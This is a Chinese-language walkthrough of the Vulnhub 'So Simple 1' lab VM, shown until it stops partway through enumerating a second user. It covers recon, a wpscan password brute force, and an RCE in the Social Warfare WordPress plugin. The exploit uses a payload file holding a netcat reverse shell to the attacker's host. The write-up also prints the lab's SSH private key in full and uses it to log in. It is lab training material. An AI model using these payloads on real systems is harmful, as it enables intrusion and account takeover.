首页 > 其他分享 >Vulnhub So Simple 1靶机解题过程

Vulnhub So Simple 1靶机解题过程

时间:2022-11-12 17:22:26浏览次数:45  
标签:56.171 http Simple 192.168 simple So Vulnhub steven wordpress

So Simple 1

识别目标主机IP地址

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1
                                                                                                                                                                                                                           
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                           
 192.168.56.100  08:00:27:2e:b4:a6      1      60  PCS Systemtechnik GmbH                                                                                                                                                   
 192.168.56.171  08:00:27:2d:d7:e0      1      60  PCS Systemtechnik GmbH           

利用Kali Linux自带的Netdiscover工具识别目标主机的IP地址为192.168.56.171

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.171 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-12 02:59 EST
Nmap scan report for bogon (192.168.56.171)
Host is up (0.00015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 5b:55:43:ef:af:d0:3d:0e:63:20:7a:f4:ac:41:6a:45 (RSA)
|   256 53:f5:23:1b:e9:aa:8f:41:e2:18:c6:05:50:07:d8:d4 (ECDSA)
|_  256 55:b7:7b:7e:0b:f5:4d:1b:df:c3:5d:a1:d7:68:a9:6b (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: So Simple
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:2D:D7:E0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.50 seconds

目标主机有两个开放端口22(SSH)以及80(HTTP)

Get Access

从HTTP服务着手信息收集和分析

┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.171 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-12 02:59 EST
Nmap scan report for bogon (192.168.56.171)
Host is up (0.00015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 5b:55:43:ef:af:d0:3d:0e:63:20:7a:f4:ac:41:6a:45 (RSA)
|   256 53:f5:23:1b:e9:aa:8f:41:e2:18:c6:05:50:07:d8:d4 (ECDSA)
|_  256 55:b7:7b:7e:0b:f5:4d:1b:df:c3:5d:a1:d7:68:a9:6b (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: So Simple
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:2D:D7:E0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.50 seconds
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ curl http://192.168.56.171
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title>So Simple</title>
    <body style="background-color:red;">
        <img src="so-simple.png" alt="so simple" width="1900" height="790">
    </body>
</head>


    <!--- Hi, nothing obvious here at the bottom of the source-code, just look further :) --->
                                                                                                  

页面中有张图片,下载到本地分析一下,

┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ wget http://192.168.56.171/so-simple.png
--2022-11-12 03:02:51--  http://192.168.56.171/so-simple.png
Connecting to 192.168.56.171:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 47258 (46K) [image/png]
Saving to: ‘so-simple.png’

so-simple.png                                            100%[================================================================================================================================>]  46.15K  --.-KB/s    in 0s      

2022-11-12 03:02:51 (556 MB/s) - ‘so-simple.png’ saved [47258/47258]

                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ ls
nmap_full_scan  so-simple.png

                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ steghide extract -sf so-simple.png 
Enter passphrase: 
steghide: the file format of the file "so-simple.png" is not supported.
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ stegseek so-simple.png /usr/share/wordlists/rockyou.txt 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[!] error: the file format of the file "so-simple.png" is not supported.
                                                                          

没有提取出有用的信息,下一步对目标站点扫描一下网络。

┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ gobuster dir -u http://192.168.56.171 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                       
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.171
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/12 03:04:09 Starting gobuster in directory enumeration mode
===============================================================
/wordpress            (Status: 301) [Size: 320] [--> http://192.168.56.171/wordpress/]
/server-status        (Status: 403) [Size: 279]
Progress: 218316 / 220561 (98.98%)===============================================================
2022/11/12 03:04:38 Finished
===============================================================

发现有一个/wordpress目录,可以用wpscan扫描一下,看有无漏洞或者识别出用户名

┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ wpscan --url http://192.168.56.171/wordpress -e u,p 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.171/wordpress/ [192.168.56.171]
[+] Started: Sat Nov 12 03:09:20 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.171/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.171/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.171/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.171/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.171/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
 |  - http://192.168.56.171/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 2.3
 | Style URL: http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.6
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.6 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.6, Match: 'Version: 1.6'

[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] simple-cart-solution
 | Location: http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/
 | Last Updated: 2022-04-17T20:50:00.000Z
 | [!] The version is out of date, the latest version is 1.0.2
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 0.2.0 (100% confidence)
 | Found By: Query Parameter (Passive Detection)
 |  - http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/assets/dist/js/public.js?ver=0.2.0
 | Confirmed By:
 |  Readme - Stable Tag (Aggressive Detection)
 |   - http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/readme.txt
 |  Readme - ChangeLog Section (Aggressive Detection)
 |   - http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/readme.txt

[+] social-warfare
 | Location: http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/
 | Last Updated: 2021-07-20T16:09:00.000Z
 | [!] The version is out of date, the latest version is 4.3.0
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Comment (Passive Detection)
 |
 | Version: 3.5.0 (100% confidence)
 | Found By: Comment (Passive Detection)
 |  - http://192.168.56.171/wordpress/, Match: 'Social Warfare v3.5.0'
 | Confirmed By:
 |  Query Parameter (Passive Detection)
 |   - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=3.5.0
 |   - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.5.0
 |  Readme - Stable Tag (Aggressive Detection)
 |   - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/readme.txt
 |  Readme - ChangeLog Section (Aggressive Detection)
 |   - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <====================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.56.171/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] max
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Nov 12 03:09:23 2022
[+] Requests Done: 59
[+] Cached Requests: 6
[+] Data Sent: 16.409 KB
[+] Data Received: 608.511 KB
[+] Memory used: 238.527 MB
[+] Elapsed time: 00:00:03
                                                          

识别出来两个用户名admin, max,看能不能破解出密码,尤其管理员账户。

┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ wpscan --url http://192.168.56.171/wordpress -P /usr/share/wordlists/rockyou.txt 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.171/wordpress/ [192.168.56.171]
[+] Started: Sat Nov 12 03:09:42 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.171/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.171/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.171/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.171/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.171/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
 |  - http://192.168.56.171/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 2.3
 | Style URL: http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.6
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.6 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.6, Match: 'Version: 1.6'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] simple-cart-solution
 | Location: http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/
 | Last Updated: 2022-04-17T20:50:00.000Z
 | [!] The version is out of date, the latest version is 1.0.2
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 0.2.0 (100% confidence)
 | Found By: Query Parameter (Passive Detection)
 |  - http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/assets/dist/js/public.js?ver=0.2.0
 | Confirmed By:
 |  Readme - Stable Tag (Aggressive Detection)
 |   - http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/readme.txt
 |  Readme - ChangeLog Section (Aggressive Detection)
 |   - http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/readme.txt

[+] social-warfare
 | Location: http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/
 | Last Updated: 2021-07-20T16:09:00.000Z
 | [!] The version is out of date, the latest version is 4.3.0
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Comment (Passive Detection)
 |
 | Version: 3.5.0 (100% confidence)
 | Found By: Comment (Passive Detection)
 |  - http://192.168.56.171/wordpress/, Match: 'Social Warfare v3.5.0'
 | Confirmed By:
 |  Query Parameter (Passive Detection)
 |   - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=3.5.0
 |   - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.5.0
 |  Readme - Stable Tag (Aggressive Detection)
 |   - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/readme.txt
 |  Readme - ChangeLog Section (Aggressive Detection)
 |   - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <===================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <====================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.56.171/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] max
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Performing password attack on Wp Login against 2 user/s
[SUCCESS] - max / opensesame                                                                                                                                                                                                      
^Cying admin / EMOPUNK Time: 00:15:50 <                                                                                                                                                > (113924 / 28694744)  0.39%  ETA: 66:16:20
[!] Valid Combinations Found:
 | Username: max, Password: opensesame

[!] No WPScan API Token given, as a result vulnerability data has not been output.                                                                                                     > (113925 / 28694744)  0.39%  ETA: 66:16:35
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Nov 12 03:25:37 2022
[+] Requests Done: 114083
[+] Cached Requests: 51
[+] Data Sent: 57.825 MB
[+] Data Received: 658.115 MB
[+] Memory used: 271.977 MB
[+] Elapsed time: 00:15:55

Scan Aborted: Canceled by User

虽然破解出max的密码,但是admin破解失败,因此只能另外寻找攻击矢量。

wpscan扫描出来有一个插件social-warfare, 比较老,看有无相应的利用漏洞:

查询到该版本有一个远程执行漏洞:

https://www.exploit-db.com/exploits/46794

将利用代码下载到Kali Linux本地

根据所给出的步骤,需要在Kali Linux建立一个payload.txt

┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ cat payload.txt          
<pre>
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.56.137 5555 >/tmp/f');
</pre>

并在Kali Linux启用监听,

┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...


┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ python2 exploit.py --target http://192.168.56.171/wordpress/ --payload-uri http://192.168.56.137:8000/payload.txt 
[>] Sending Payload to System!

执行exploit.py,在Kali LInux成功获得shell

┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ sudo nc -nlvp 5555
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.171] 35364
bash: cannot set terminal process group (780): Inappropriate ioctl for device
bash: no job control in this shell
www-data@so-simple:/var/www/html/wordpress/wp-admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@so-simple:/var/www/html/wordpress/wp-admin$ 

www-data@so-simple:/home/max$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@so-simple:/home/max$ cat personal.txt
cat personal.txt
SGFoYWhhaGFoYSwgaXQncyBub3QgdGhhdCBlYXN5ICEhISA=
www-data@so-simple:/home/max$ 

peronal.txt是经过base64编码的,解码一下:

──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ echo "SGFoYWhhaGFoYSwgaXQncyBub3QgdGhhdCBlYXN5ICEhISA=" | base64 -d
Hahahahaha, it's not that easy !!!                
www-data@so-simple:/home/max/.ssh$ ls -alh
ls -alh
total 20K
drwxr-xr-x 2 max  max  4.0K Jul 14  2020 .
drwxr-xr-x 7 max  max  4.0K Jul 15  2020 ..
-rw-r--r-- 1 max  max   568 Jul 14  2020 authorized_keys
-rwxr-xr-x 1 root root 2.6K Jul 14  2020 id_rsa
-rw-r--r-- 1 root root  568 Jul 14  2020 id_rsa.pub
www-data@so-simple:/home/max/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

将max用户的私钥拷贝至Kali Linux本地,然后利用该私钥登录目标主机

┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ vim max_id_rsa
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ chmod 400 max_id_rsa 
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ ssh -i max_id_rsa [email protected]
The authenticity of host '192.168.56.171 (192.168.56.171)' can't be established.
ED25519 key fingerprint is SHA256:+ejHZkFq2lUl66K6hxgfr5b2MoCZzYE8v3yBV3/XseI.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.171' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Nov 12 08:52:51 UTC 2022

  System load:  0.0               Processes:                133
  Usage of /:   57.6% of 8.79GB   Users logged in:          0
  Memory usage: 30%               IPv4 address for docker0: 172.17.0.1
  Swap usage:   0%                IPv4 address for enp0s3:  192.168.56.171

 * "If you've been waiting for the perfect Kubernetes dev solution for
   macOS, the wait is over. Learn how to install Microk8s on macOS."

   https://www.techrepublic.com/article/how-to-install-microk8s-on-macos/

47 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Wed Jul 15 19:18:39 2020 from 192.168.1.7
max@so-simple:~$ id
uid=1000(max) gid=1000(max) groups=1000(max),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
max@so-simple:~$ ls -alh
total 52K
drwxr-xr-x 7 max  max  4.0K Jul 15  2020 .
drwxr-xr-x 4 root root 4.0K Jul 12  2020 ..
-rw-r--r-- 1 max  max   220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 max  max  3.8K Jul 12  2020 .bashrc
drwx------ 2 max  max  4.0K Jul 12  2020 .cache
drwx------ 3 max  max  4.0K Jul 12  2020 .gnupg
drwxrwxr-x 3 max  max  4.0K Jul 12  2020 .local
-rw------- 1 max  max   118 Jul 12  2020 .mysql_history
-rw-r--r-- 1 max  max   807 Feb 25  2020 .profile
drwxr-xr-x 2 max  max  4.0K Jul 14  2020 .ssh
-rw-r--r-- 1 max  max    49 Jul 12  2020 personal.txt
drwxrwxr-x 3 max  max  4.0K Jul 12  2020 this
-rwxr-x--- 1 max  max    33 Jul 13  2020 user.txt
max@so-simple:~$ cat user.txt
073dafccfe902526cee753455ff1dbb0

得到了第一个flag.

现在要想办法拿到steven的shell

max@so-simple:~$ cat .mysql_history
show databases;
use wordpress;
show tables;
use wp_users;
select wp_users
;
select wp_users;
select * from wp_users
;
max@so-simple:~$ cd ..
max@so-simple:/home$ ls 
max  steven
max@so-simple:/home$ cd steven
max@so-simple:/home/steven$ ls -alh
total 28K
drwxr-xr-x 3 steven steven 4.0K Jul 15  2020 .
drwxr-xr-x 4 root   root   4.0K Jul 12  2020 ..
